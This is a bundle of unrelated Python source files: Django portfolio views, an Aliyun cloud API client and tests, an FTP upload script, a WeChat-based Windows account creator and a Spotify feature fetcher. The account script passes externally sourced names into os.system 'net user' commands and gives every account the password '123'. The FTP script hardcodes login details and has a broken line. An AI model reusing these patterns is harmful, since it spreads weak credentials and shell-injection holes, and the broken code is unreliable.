model = Transaction
# https://docs.djangoproject.com/en/dev/topics/class-based-views/generic-display/#dynamic-filtering
def get_queryset(self):
if 'action' in self.kwargs and 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id']).filter(action=self.kwargs['action'].upper())
elif 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id'])
else:
return Transaction.objects.all()
class TransactionDetailView(UpdateView):
model = Transaction
form_class = TransactionDetailForm
success_url = "/portfolio/txn/all"
class TransactionCreateView(CreateView):
model = Transaction
success_url = "/portfolio/txn/all"
class TransactionDeleteView(DeleteView):
model = Transaction
success_url = "/portfolio/txn/all"
class AccountListView(ListView):
model = Account
class AccountDetailView(DetailView):
model = Account
class AccountEditView(UpdateView):
model = Account
form_class = AccountForm
success_url = "/portfolio"
class AccountCreateView(CreateView):
model = Account
form_class = AccountForm
success_url = "/portfolio"
class AccountDeleteView(DeleteView):
model = Account
success_url = "/portfolio"
class DividendListView(ListView):
model = Transaction
template_name = "portfolio/dividend_list.html"
# https://docs.djangoproject.com/en/dev/topics/class-based-views/generic-display/#dynamic-filtering
def get_queryset(self):
if 'action' in self.kwargs and 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id']).filter(action=self.kwargs['action'].upper())
elif 'security_id' in self.kwargs:
return Transaction.objects.filter(security_id=self.kwargs['security_id'])
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super(DividendListView, self).get_context_data(**kwargs)
divsum = Transaction.objects.filter(account_id=self.kwargs['account_id']).filter(action='DIV').filter(security_id=self.kwargs['security_id']).aggregate(Sum('cash_amount'))
context['divsum'] = divsum['cash_amount__sum']
return context
class DividendYearListView(ListView):
model = Transaction
template_name = "portfolio/dividend_list.html"
def get_queryset(self):
return Transaction.objects.filter(date__year=self.kwargs['year']).filter(action='DIV')
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super(DividendYearListView, self).get_context_data(**kwargs)
divsum = Transaction.objects.filter(date__year=self.kwargs['year']).filter(action='DIV').aggregate(Sum('cash_amount'))
context['divsum'] = divsum['cash_amount__sum']
context['year'] = self.kwargs['year']
return context
class AccountViewSet(viewsets.ModelViewSet):
"""
Returns list of accounts
"""
queryset = Account.objects.all()
serializer_class = AccountSerializer
class SecurityViewSet(viewsets.ModelViewSet):
"""
Returns a list of all securities.
"""
queryset = Security.objects.all()
serializer_class = SecuritySerializer
permission_classes = [
permissions.AllowAny
]
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
Security.objects.create_security(**serializer.validated_data)
return Response(serializer.validated_data, status=status.HTTP_201_CREATED)
return Response({
'status': 'Bad request',
'message': 'Account could not be created with received data.'
}, status=status.HTTP_400_BAD_REQUEST)
class SecurityIndexView(TemplateView):
template_name = 'security_index.html'
@method_decorator(ensure_csrf_cookie)
def dispatch(self, *args, **kwargs):
return super(SecurityIndexView, self).dispatch(*args, **kwargs)
class DividendChartByYearView(APIView):
def get(self, request, *args, **kwargs):
bymonth_select = {"month": """DATE_TRUNC('month', date)"""} # Postgres specific
months = Transaction.objects.extra(select=bymonth_select).filter(action='DIV').filter(date__year=self.kwargs['year']).values('month').annotate(sum_month=Sum('cash_amount')).order_by('month')
div_data = {'months': list(range(1,13)), 'sums': [0]*12}
for data in months:
div_data['sums'][data['month'].month - 1] = data['sum_month']
dataD = {}
dataD['chart_data'] = div_data
result = json.dumps(dataD, cls=CustomEncoder)
response = Response(dataD, status=status.HTTP_200_OK) #, content_type='application/json')
return response
class PositionView(APIView):
"""
APIView to get positions for a certain account
"""
def get(self, request, *args, **kwargs):
"""
Get list of all positions
- **parameters**, **return**::
:param request: ``Request`` instance (from REST framework)
:param kwargs: keyword parameters from URL, specifically ``account_id``
:return: positions dictionary
"""
account = get_object_or_404(Account, pk=kwargs['account_id'])
data = account.get_positions()
return Response(data, status=status.HTTP_200_OK)
class SecurityQuoteView(APIView):
'''Stock quotes from defined provider'''
def get(self, request, *args, **kwargs):
'''
Get stock quote from defined provider
'''
ticker = kwargs['stock']
try:
security = Security.objects.filter(ticker = ticker)[:1].get()
except Security.DoesNotExist:
# Wanted ticker did not exists
return Response({}, status=status.HTTP_200_OK)
cmd = Command()
# Find out price tracker and fetch quote from it
if (security.price_tracker.name == 'Yahoo'):
result = cmd.get_yahoo_stock_quote(ticker)
elif security.price_tracker.name == 'IEXCloud':
result = cmd.get_iexcloud_stock_quote(ticker)
else:
# If not Yahoo, assume AlphaVantage for now
result = cmd.get_alpha_vantage_stock_quote(ticker)
if result:
# Replace Currency object with its printable representation
result['currency'] = result['currency'].iso_code
result['ticker'] = ticker
return Response(result, status=status.HTTP_200_OK)
class ExchangeRatesView(APIView):
'''Get exchange rates'''
def get(self, request, *args, **kwargs):
API_KEY = getattr(settings, 'FIXER_IO_API_KEY', None)
if not API_KEY:
raise ImproperlyConfigured(
'FIXER_IO_API_KEY not set')
response = requests.get('http://data.fixer.io/api/latest?access_key=' +
API_KEY)
try:
decoded_response = response.json()
except:
error = sys.exc_info()[0]
return Response({'error': error}, status=status.HTTP_400_BAD_REQUEST)
finally:
if response.status_code == status.HTTP_200_OK:
return Response(decoded_response, status=status.HTTP_200_OK)
else:
return Response({}, status=status.HTTP_400_BAD_REQUEST)
# Functions
def deposit(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = DepositWithdrawForm()
else:
form = DepositWithdrawForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
cash_amount = form.cleaned_data['cash_amount']
currency = form.cleaned_data['currency']
a.deposit(cash_amount=cash_amount, date=date, security=security,
currency=currency)
return redirect('/portfolio/account/' + account_id + '/')
action_title = "Deposit"
title = action_title + " cash"
return render(request, 'portfolio/deposit_withdraw.html',
{'form': form,
'title': title,
'action_title': action_title,})
def withdraw(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = DepositWithdrawForm()
else:
form = DepositWithdrawForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
cash_amount = form.cleaned_data['cash_amount']
currency = form.cleaned_data['currency']
a.withdraw(cash_amount=cash_amount, date=date, security=security,
currency=currency)
return redirect('/portfolio/account/' + account_id + '/')
action_title = "Withdraw"
title = action_title + " cash"
return render(request, 'portfolio/deposit_withdraw.html',
{'form': form,
'title': title,
'action_title': action_title,})
def buySell(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = BuyForm()
else:
form = BuyForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
shares = form.cleaned_data['shares']
price = form.cleaned_data['price']
action = form.cleaned_data['action']
commission = form.cleaned_data['commission']
currency = form.cleaned_data['currency']
exchange_rate = form.cleaned_data['exchange_rate']
a.buySellSecurity(security=security, shares=shares, date=date,
price=price, commission=commission, action=action,
currency=currency, exchange_rate=exchange_rate)
return redirect('/portfolio/account/' + account_id + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'account': a,
'sub_title': 'Buy or sell'})
def div(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = DivForm()
else:
form = DivForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
security = form.cleaned_data['security']
price = form.cleaned_data['price']
commission = form.cleaned_data['commission']
cash_amount = form.cleaned_data['cash_amount']
currency = form.cleaned_data['currency']
exchange_rate = form.cleaned_data['exchange_rate']
a.div(security=security, date=date,
price=price, commission=commission,
cash_amount=cash_amount,
currency=currency, exchange_rate=exchange_rate)
return redirect('/portfolio/account/' + account_id + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'account': a,
'sub_title': 'Add dividends',})
def txnByName(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = TxnBySecurityForm()
else:
form = TxnBySecurityForm(request.POST)
if form.is_valid():
security = form.cleaned_data['security']
a.txnByName(security=security)
return redirect('/portfolio/txn/' + account_id + '/byname/' + str(security.id) + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'account': a,
'sub_title': 'Transactions by security'})
def txnDiv(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = TxnBySecurityForm()
years = Account.div_years.div_years(account_id)
else:
form = TxnBySecurityForm(request.POST)
if form.is_valid():
security = form.cleaned_data['security']
sum = Transaction.objects.filter(account_id=account_id).filter(action='DIV').filter(shares__gt=0).aggregate(Sum('cash_amount'))
return redirect('/portfolio/txn/' + account_id + '/div/' + str(security.id) + '/')
return render(request, 'portfolio/transaction.html',
{'form': form,
'yearly_divs' : True,
'years' : years,
'account' : a,
'sub_title': 'Display dividends'})
def interest(request, account_id):
a = get_object_or_404(Account, pk=account_id)
if request.method == 'GET':
form = InterestForm()
else:
form = InterestForm(request.POST)
if form.is_valid():
date = form.cleaned_data['date']
amount = form.cleaned_data['amount']
a.receive_interest(amount=amount, date=date)
return redirect('/portfolio/account/' + account_id + '/')
return render(request, 'portfolio/interest.html', {'form': form})
``` |
{
"source": "jokimina/aliyunpy",
"score": 2
} |
#### File: client/api/dns.py
```python
from aliyunsdkalidns.request.v20150109 import DescribeDomainsRequest, \
DescribeDomainRecordsRequest
from .base import BaseAliyunApi
class AliyunDns(BaseAliyunApi):
"""
阿里云DNS相关API
"""
def get_dns_list(self):
"""
获取DNS列表
:return: DNS列表
"""
request = DescribeDomainsRequest.DescribeDomainsRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
first_page_result = self.client.do_action(request)
total_count, page_size = first_page_result['TotalCount'], \
first_page_result['PageSize']
if total_count <= page_size:
return first_page_result['Domains']['Domain']
result_list = first_page_result['Domains']['Domain']
_page_num = (total_count / page_size) \
if total_count % page_size == 0 \
else (int(total_count / page_size) + 1)
for _page in range(2, _page_num + 1):
request.set_PageNumber(_page)
page_result = self.client.do_action(request)
result_list.extend(page_result['Domains']['Domain'])
return result_list
def get_record_count(self, domain_name):
"""
:return: 对应域名解析记录总数
"""
request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest()
request.set_accept_format('json')
request.set_DomainName(domain_name)
record_count = self.client.do_action(request)['TotalCount']
return record_count
def get_dns_record(self, domain_name):
"""
获取DNS解析记录
:params: 二级域名
:return: 对应域名解析记录
"""
request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest()
request.set_accept_format('json')
request.set_PageNumber(1)
request.set_PageSize(100)
request.set_DomainName(domain_name)
first_page_result = self.client.do_action(request)
total_count, page_size = first_page_result['TotalCount'], \
first_page_result['PageSize']
if total_count <= page_size:
return first_page_result['DomainRecords']['Record']
result_list = first_page_result['DomainRecords']['Record']
_page_num = (total_count / page_size) \
if total_count % page_size == 0 \
else (int(total_count / page_size) + 1)
for _page in range(2, _page_num + 1):
request.set_PageNumber(_page)
page_result = self.client.do_action(request)
result_list.extend(page_result['DomainRecords']['Record'])
return result_list
```
#### File: client/api/oss.py
```python
import oss2
from .base import BaseAliyunApi
class AliyunOss(BaseAliyunApi):
default_endpoint = 'http://oss-cn-beijing.aliyuncs.com'
def list_bucket(self):
"""
列出当前所有oss bucket
https://help.aliyun.com/document_detail/31957.html?spm=a2c4g.11186623.6.1105.4c9e556cYuWTBJ
:return:
"""
result_list = []
service = oss2.Service(self.client.oss_auth, self.default_endpoint)
result = service.list_buckets()
buckets = result.buckets
result_list.extend(buckets)
if result.is_truncated:
r = service.list_buckets(marker=result.next_marker)
result_list.extend(r.buckets)
while True:
if r.is_truncated:
r = service.list_buckets(marker=result.next_marker)
result_list.extend(r.buckets)
break
result_list = [r.__dict__ for r in result_list]
return result_list
```
#### File: aliyunpy/tests/config.py
```python
import os
import sys
import re
import inspect
import json
from functools import wraps
import httpretty
def read_fixture(function):
path = os.path.join(os.path.dirname(inspect.getfile(function)) + os.sep + 'fixtures',
function.__name__.lstrip('test_') + '.json')
with open(path, 'rb') as f:
return f.read()
def auto_set_fixture(path=None, is_json=True):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not path:
fixture = read_fixture(func)
else:
with open(path, 'rb') as f:
fixture = f.read()
if is_json:
fixture = json.loads(fixture)
kwargs.update({'fixture': fixture})
return func(*args, **kwargs)
return wrapper
return decorator
def auto_load_fixture(func):
@wraps(func)
def wrapper(*args, **kwargs):
httpretty.register_uri(httpretty.GET, re.compile(r'^.*\.aliyuncs\.com.*$'), body=read_fixture(func),
content_type='application/json')
return func(*args, **kwargs)
return wrapper
def suppress_warnings(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not sys.warnoptions:
import warnings
warnings.simplefilter("ignore")
return func(*args, **kwargs)
return wrapper
```
#### File: aliyunpy/tests/test_client_bss.py
```python
import json
import datetime
import httpretty
from .base import BaseAliyunTestCase
from .config import auto_load_fixture, suppress_warnings
class AliyunClientBssTestCase(BaseAliyunTestCase):
def test_query_bill(self):
r = self.client.bss.query_bill('2019-01')
print(len(r))
print(sum([x['PaymentAmount'] for x in r]))
# print(json.dumps(r, ensure_ascii=False))
def test_query_bill_overview(self):
r = self.client.bss.query_bill_overview('2019-01')
print(json.dumps(r, ensure_ascii=False))
def test_query_instance_bill(self):
r = self.client.bss.query_instance_bill('2019-01', ProductCode='ecs', SubscriptionType='Subscription',
PageSize=100)
print(json.dumps(r, ensure_ascii=False))
def test_query_instance_gaap_cost(self):
r = self.client.bss.query_instance_gaap_cost(billing_cycle='2019-01')
print(json.dumps(r, ensure_ascii=False))
def test_query_order(self):
# tz_utc_8 = datetime.timezone(datetime.timedelta(hours=0))
order_cycle = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time())
# r = self.client.bss.query_orders(CreateTimeStart=order_cycle)
r = self.client.bss.query_order(CreateTimeStart='2019-01-01T00:00:00Z', CreateTimeEnd='2019-02-01T00:00:00Z')
print(len(r))
print(sum([x['PretaxAmount'] for x in r]))
# print(json.dumps(r, ensure_ascii=False))
def test_get_order_detail(self):
r = self.client.bss.get_order_detail('203269617950649')
print(json.dumps(r, ensure_ascii=False))
```
#### File: aliyunpy/tests/test_client_drds.py
```python
import json
from .base import BaseAliyunTestCase
class AliyunClientDrdsTestCase(BaseAliyunTestCase):
def test_get_regions(self):
r = self.client.drds.get_regions(id_only=True)
print(json.dumps(r, indent=2, ensure_ascii=False))
def test_list_drds(self):
r = self.client.drds.list_drds()
print(json.dumps(r, indent=2, ensure_ascii=False))
```
#### File: aliyunpy/tests/test_client_ecs.py
```python
import re
import json
import httpretty
from aliyunpy.client import AliyunClient
from .config import auto_set_fixture
from .base import BaseAliyunTestCase
class AliyunClientEcsTestCase(BaseAliyunTestCase):
@httpretty.activate
@auto_set_fixture
def test_list_ecs(self, fixture=None):
p1 = fixture[0]
p2 = fixture[1]
httpretty.register_uri(httpretty.GET, re.compile(r'^.*\.aliyuncs\.com.*PageNumber=1.*$'), body=json.dumps(p1),
content_type='application/json', match_querystring=True)
httpretty.register_uri(httpretty.GET, re.compile(r'^.*\.aliyuncs\.com.*PageNumber=2.*$'), body=json.dumps(p2),
content_type='application/json', match_querystring=True)
r1 = self.client.ecs.list_ecs()
self.assertEqual(101, len(r1))
r2 = self.client.ecs.list_ecs(name_only=True)
self.assertEqual(True, all([True if isinstance(x, str) else False for x in r2]))
def test_list_ecs_all_region(self):
r = self.client.ecs.list_ecs()
print(len(r))
def test_get_regions(self):
r = self.client.ecs.get_regions(id_only=True)
print(json.dumps(r, indent=2, ensure_ascii=False))
```
#### File: aliyunpy/tests/test_client_log.py
```python
from .base import BaseAliyunTestCase
class AliyunClientLogTestCase(BaseAliyunTestCase):
def test_list_project(self):
r = self.client.log.list_project()
print(r)
def test_list_logstore(self):
r = self.client.log.list_logstore(project_name='acslog-project-cfb0d65eb7-jlgra')
print([x for x in r if x != 'config-operation-log' and 'py3' not in x])
def test_delete_logstore(self):
project_name = 'acslog-project-cfb0d65eb7-jlgra'
r = self.client.log.list_logstore(project_name=project_name)
dlist = [x for x in r if x != 'config-operation-log' and 'py3' not in x]
for logstore in dlist:
self.client.log_client.delete_logstore(project_name, logstore).log_print()
```
#### File: aliyunpy/tests/test_client_ons.py
```python
import json
from .base import BaseAliyunTestCase
class AliyunClientOnsTestCase(BaseAliyunTestCase):
def test_get_regions(self):
r = self.client.ons.get_regions(id_only=True)
print(json.dumps(r, indent=2, ensure_ascii=False))
def test_get_instances(self):
r = self.client.ons.get_instances()
print(json.dumps(r, indent=2, ensure_ascii=False))
print(len(r))
def test_list_topics(self):
r = self.client.ons.list_topic(instance_id='MQ_INST_1726708279589269_yyyyy8Ak')
print(json.dumps(r, indent=2, ensure_ascii=False))
print(len(r))
def test_list_topic_all(self):
r = self.client.ons.list_topic_all()
print(json.dumps(r, indent=2, ensure_ascii=False))
print(len(r))
``` |
{
"source": "jokimina/miscellany",
"score": 3
} |
#### File: prod/japan/ftpupload.py
```python
import sys
import os
import json
from ftplib import FTP
_XFER_FILE = 'FILE'
_XFER_DIR = 'DIR'
class Xfer(object):
'''
@note: upload local file or dirs recursively to ftp server
'''
def __init__(self):
self.ftp = None
def __del__(self):
pass
def setFtpParams(self, ip, uname, pwd, port = 21, timeout = 60):
self.ip = ip
self.uname = uname
self.pwd = <PASSWORD>
self.port = port
self.timeout = timeout
def initEnv(self):
if self.ftp is None:
self.ftp = FTP()
print '### connect ftp server: %s ...'%self.ip
self.ftp.connect(self.ip, self.port, self.timeout)
self.ftp.login(self.uname, self.pwd)
print self.ftp.getwelcome()
def clearEnv(self):
if self.ftp:
self.ftp.close()
print '### disconnect ftp server: %s!'%self.ip
self.ftp = None
def uploadDir(self, localdir='./', remotedir='./'):
if not os.path.isdir(localdir):
return
self.ftp.cwd(remotedir)
for file in os.listdir(localdir):
src = os.path.join(localdir, file)
if os.path.isfile(src):
self.uploadFile(src, file)
elif os.path.isdir(src):
try:
self.ftp.mkd(file)
except:
sys.stderr.write('the dir is exists %s'%file)
self.uploadDir(src, file)
self.ftp.cwd('..')
def uploadFile(self, localpath, remotepath='./'):
if not os.path.isfile(localpath):
return
print '+++ upload %s to %s:%s'%(localpath, self.ip, remotepath)
self.ftp.storbinary('STOR ' + remotepath, open(localpath, 'rb'))
def __filetype(self, src):
if os.path.isfile(src):
index = src.rfind('\\')
if index == -1:
index = src.rfind('/')
return _XFER_FILE, src[index+1:]
elif os.path.isdir(src):
return _XFER_DIR, ''
def upload(self, src):
filetype, filename = self.__filetype(src)
self.initEnv()
if filetype == _XFER_DIR:
self.srcDir = src
self.uploadDir(self.srcDir)
elif filetype == _XFER_FILE:
self.uploadFile(src, filename)
self.clearEnv()
if __name__ == '__main__':
source_dir = sys.argv[1]
srcDir = r"/data/tools/prod/japan/cdn/" +
#srcFile = r'C:\sytst\sar.c'
xfer = Xfer()
xfer.setFtpParams('ftp.cdn.twgate.net', 'jmr', 'ij2hu1zh')
xfer.upload(srcDir)
#xfer.upload(srcFile)
```
#### File: python/Windows/createUsers.py
```python
import urllib2
import simplejson as json
import sys
import os
import pypinyin
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
class weChat:
def __init__(self,url,Corpid,Secret):
url = '%s/cgi-bin/gettoken?corpid=%s&corpsecret=%s' % (url,Corpid,Secret)
self.url = url
res = self.url_req(url)
self.token = res['access_token']
def url_req(self,url,method='get',data={}):
if method == 'get':
req = urllib2.Request(url)
res = json.loads(urllib2.urlopen(req).read())
elif method == 'post':
req = urllib2.Request(url,data)
res = json.loads(urllib2.urlopen(req).read())
else:
print 'error request method...exit'
sys.exit()
return res
def get_department(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/department/list?access_token=%s&id=0" % self.token
return self.url_req(url)
def get_department_users(self,department_id,fetch_child=1,status=0):
'''
department_id = 0 部门id
fetch_child = 1 是否递归子部门 1/0
status = 0 0获取全部成员,1获取已关注成员列表,2获取禁用成员列表,4获取未关注成员列表。status可叠加,未填写则默认为0
'''
url = "https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token=%s&department_id=%s&fetch_child=%s&status=%s" % (
self.token,department_id,fetch_child,status)
return self.url_req(url)
def send_message(self,userlist,content,agentid=0):
self.userlist = userlist
self.content = content
url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s' % self.token
data = {
"touser": "",
"toparty": "",
"totag": "",
"msgtype": "text",
"agentid": "0",
"text": {
"content": ""
},
"safe":"0"
}
data['touser'] = userlist
data['agentid'] = agentid
data['text']['content'] = content
data = json.dumps(data,ensure_ascii=False)
# print data
res = self.url_req(url,method='post',data=data)
if res['errmsg'] == 'ok':
print 'send sucessed!!!'
else:
print 'send failed!!'
print res
def trans_pinyin(self,strings):
return ''.join(pypinyin.lazy_pinyin(strings,errors='ignore'))
if __name__ == '__main__':
#userlist = sys.argv[1]
#content = sys.argv[2:]
#content = '\n'.join(content)
Corpid = 'wx2e73e37a04685fb8'
Secret = '<KEY>'
url = 'https://qyapi.weixin.qq.com'
wechat = weChat(url,Corpid,Secret)
# print json.dumps(wechat.get_department(),indent=2,ensure_ascii=False)
# sys.exit()
# print wechat.url
# print wechat.token
# print json.dumps(wechat.get_department(),ensure_ascii=False,indent=2)
users = []
names = []
# users.extend(wechat.get_department_users(23)["userlist"])
users.extend(wechat.get_department_users(40)["userlist"])
users.extend(wechat.get_department_users(18)["userlist"])
names = [ wechat.trans_pinyin(name["name"]) for name in users ]
names = [ name for name in names if name != '' and len(name) < 20 ]
for user in users :
print user
name = wechat.trans_pinyin(user["name"])
if name != '' and len(name) < 20 :
os.system('net user %s %s /add' % (name,'123'))
os.system('net localgroup wifi %s /add' % name)
else:
print
# print json.dumps(users,ensure_ascii=False,indent=2)
``` |
{
"source": "Jokinen/lunches-backend",
"score": 3
} |
#### File: lunches-backend/mobileparser/unica.py
```python
__version__ = '0.5.2'
import logging
import requests
#import lxml
import re
import datetime
from bs4 import BeautifulSoup as bs
from parser_exceptions import *
from parser_abc import Parser, Restaurant, Day, Food
from restaurant_urls import UNICA_RESTAURANTS as unica_urls
__foodmenu_list__ = "#content .pad .menu-list"
__foodlists__ = "#content .pad .menu-list .accord"
__opening_times__ = "#content .pad.mod .threecol"
__restaurant_infos__ = "div#maplist ul.append-bottom li.color"
__week_number__ = "#content .pad .head2"
class Unica(Parser):
# @abstractmethod
def __init__(self):
super(Unica, self).__init__("Unica", __version__)
self.logger = logging.getLogger(" {0}".format(__name__))
# @abstractmethod
def parse(self):
parse_results = []
for url in unica_urls:
page = self.load_page(url["url_fi"])
if page == 1:
# page could not be loaded, move on to next url
continue
soup = bs(page.text, 'html.parser')
restaurant, error = self.parse_page(soup, url["url_fi"])
restaurant.restaurant_info["name"] = url["name"]
restaurant.restaurant_info["id"] = url["id"]
restaurant.restaurant_info["chain"] = "unica"
if error:
self.logger.debug("Restaurant foods were not found")
parse_results.append(restaurant)
parse_date = str(datetime.date.today())
return {
"restaurants": parse_results,
"parser_version": self.version,
"parser_name": self.name,
"parse_date": parse_date
}
# @abstractmethod
def parse_page(self, soup, link):
parse_year = datetime.date.today().year
if self.assert_foodlist_exists(soup):
week_number = self.parse_week_number(soup)
weekly_foods = self.parse_foods(soup)
restaurant_info = self.parse_restaurant_info(soup, link)
restaurant = Restaurant(restaurant_info,
weekly_foods,
week_number,
parse_year)
return restaurant, False
else:
week_number = datetime.date.today().isocalendar()[1]
restaurant_info = self.parse_restaurant_info(soup, link)
restaurant = Restaurant(restaurant_info,
[],
week_number,
parse_year)
return restaurant, True
def parse_foods(self, soup):
weekly_foods = {}
week_days = soup.select(__foodlists__)
for index, day in enumerate(week_days):
try:
day_name = self.encode_remove_eol(day.h4.getText())
day_number = index
lunch_elements = day.table.select(".lunch")
diet_elements = day.table.select(".limitations")
price_elements = day.table.select(".price")
try:
alert_element = self.encode_remove_eol(day.table.find(
"span", {"class": "alert"}).getText())
except AttributeError, e:
# alert element not found
alert_element = ""
daily_lunches = [self.encode_remove_eol(x.getText())
for x in lunch_elements]
daily_diets = [self.encode_remove_eol(x.getText())
for x in diet_elements]
daily_prices = [re.findall(r"\d\,\d\d", self.encode_remove_eol(
x.getText())) for x in price_elements]
daily_foods = [Food(name, diets, prices)
for name, diets, prices in zip(daily_lunches,
daily_diets,
daily_prices)]
weekly_foods[str(day_number)] = Day(
day_name, day_number, daily_foods, alert_element)
except Exception, e:
self.logger.exception(e)
return weekly_foods
def parse_opening_times(self, soup):
# contains opening hours
opening_hours_elements = soup.select(__opening_times__)
if len(opening_hours_elements) == 0:
return {}
weekdays = ['ma', 'ti', 'ke', 'to', 'pe', 'la', 'su']
if len(opening_hours_elements) > 1:
for section in opening_hours_elements:
section_title = str(
self.encode_remove_eol(section.h3.get_text()))
if section_title.lower() == 'lounas':
opening_times_element = section
else:
opening_times_element = opening_hours_elements[0]
# sanitize and split the initial string
days_hours = self.parse_opening_data(
opening_times_element.p.get_text())
days_hours = self.encode_split_newline(days_hours)
# apply hotfixes to the data here, as needed
days_hours = map(self.patch_data, days_hours)
self.logger.debug(days_hours)
opening_dates = {}
for elem in days_hours:
elem_days = elem.split(' ')[0]
elem_hours = elem.split(' ')[1]
if len(elem_days) and len(elem_hours):
days = []
if '-' in elem_days:
start_index = weekdays.index(
elem_days.split('-')[0].lower())
end_index = weekdays.index(
elem_days.split('-')[1].lower()) + 1
days.append(weekdays[start_index:end_index])
else:
if '-' in elem_hours:
days.append([elem_days.lower()])
else:
break
elem_hours = self.sanitize_opening_hour(elem_hours)
elem_hours = map(self.parse_hours, elem_hours.split('-'))
for day in days[0]:
if len(day) == 2:
opening_dates[day] = (elem_hours[0], elem_hours[1])
self.logger.debug(opening_dates)
return opening_dates
def parse_opening_data(self, data):
sanitized = data
if len(sanitized):
if data[-1] == ',' or data[-1] == ' ':
sanitized = sanitized[:-1] + '\n'
sanitized = sanitized.replace(' -', '-').replace(', ', '\n')
return sanitized
def parse_hours(self, hours):
parsed = hours
if len(parsed):
if "." not in str(hours):
parsed = hours + ".00"
return parsed
def sanitize_opening_hour(self, data):
sanitized = data
if len(sanitized):
if ' -' in sanitized:
sanitized = sanitized.replace(' -', '-')
if '.-' in sanitized:
sanitized = sanitized.replace('.-', '.00-')
if sanitized[-1] == '.' and sanitized[-1] != '00.':
sanitized = sanitized[:-1]
if ',' in sanitized:
sanitized = sanitized.replace(',', '')
return sanitized
def patch_data(self, data):
sanitized = data
if len(sanitized):
# Macciavelli fix
if 'Lunch' in sanitized:
sanitized = sanitized.replace('Lunch', '').strip()
# NBSP fix
sanitized = sanitized.replace(
'\xc2\xa0', '')
# remove all extra space
sanitized = " ".join(sanitized.split())
return sanitized
def parse_restaurant_info(self, soup, url):
restaurant_elements = soup.select(__restaurant_infos__)
try:
for restaurant in restaurant_elements:
restaurant_url = self.encode_remove_eol(
restaurant.attrs['data-uri'])
if restaurant_url not in url:
pass
else:
address = self.encode_remove_eol(
restaurant.attrs['data-address'])
zip_code = self.encode_remove_eol(
restaurant.attrs['data-zip'])
post_office = self.encode_remove_eol(
restaurant.attrs['data-city'])
longitude = self.encode_remove_eol(
restaurant.attrs['data-longitude'])
latitude = self.encode_remove_eol(
restaurant.attrs['data-latitude'])
opening_times = self.parse_opening_times(
soup)
restaurant_info = {
"address": address,
"zip_code": zip_code,
"post_office": post_office,
"longitude": longitude,
"latitude": latitude,
"opening_times": opening_times
}
return restaurant_info
except Exception, e:
self.logger.exception(e)
def parse_week_number(self, soup):
head_element = soup.select(
__week_number__)[0].getText().encode("utf-8", "ignore")
week_number = int(re.findall(r"\d\d", head_element)[0])
self.logger.debug("week number: " + str(week_number))
return week_number
def assert_foodlist_exists(self, soup):
menu_list = soup.select(__foodmenu_list__)
lunches = soup.select(__foodmenu_list__ + " .lunch")
menu_isnt_empty = len(menu_list) != 0
lunches_arent_empty = len(lunches) != 0
return (menu_isnt_empty and lunches_arent_empty)
def encode_remove_eol(self, text):
try:
return text.encode('utf-8', 'ignore').strip().replace(
'\n', '').replace('\t', '').replace('\r', '')
except UnicodeEncodeError, e:
self.logger.exception(e)
return text
def encode_split_newline(self, text):
try:
return text.encode('utf-8', 'ignore').strip().replace(
'\t', '').replace('\r', '').split('\n')
except UnicodeEncodeError, e:
self.logger.exception(e)
return text
def load_page(self, link):
try:
self.logger.debug(" Loading page " + link + "...")
html = requests.get(link)
self.logger.debug(" Done.")
return html
except RequestException, e:
self.logger.exception(e)
return 1
def __repr__(self):
return "{0} version {1}".format(self.name, __version__)
``` |
{
"source": "jokineno/Predict-Spotify-Top200",
"score": 3
} |
#### File: Predict-Spotify-Top200/src/audio_features.py
```python
import os
import spotipy
import spotipy.util as util
import pandas as pd
def load_environment():
from dotenv import load_dotenv
load_dotenv()
username = os.getenv("USR")
client_id = os.getenv("ID")
client_secret = os.getenv("SECRET")
redirect_uri = os.getenv("URI")
return username, client_id, client_secret, redirect_uri
def get_audio_features(infile, outfile, username, client_id, client_secret, redirect_uri):
scope = 'user-read-private user-read-playback-state user-modify-playback-state'
# Erase catche and prompt for user permission
try:
token = util.prompt_for_user_token(username,
scope,
client_id=client_id,
client_secret=client_secret,
redirect_uri=redirect_uri)
except Exception:
os.remove(f".cache-{username}")
token = util.prompt_for_user_token(username, scope)
# Create spotify object
sp = spotipy.Spotify(auth=token)
user = sp.current_user()
displayName = user['display_name']
print(">>> Hello", displayName)
data = pd.read_csv(infile)
track_features = sp.audio_features(data.id[0])
track_df = pd.DataFrame(track_features)
df = pd.DataFrame(columns=track_df.columns)
n = 0
for id in data.id:
try:
features = sp.audio_features(id)
except Exception:
continue
n += 1
print(n)
feature_df = pd.DataFrame(features)
df = df.append(feature_df)
index_length = df.shape[0]
index_set = list(range(index_length))
df = df.set_index(pd.Index(index_set))
final_df = data.join(df, lsuffix='_caller', rsuffix='_other')
final_df.to_csv(outfile)
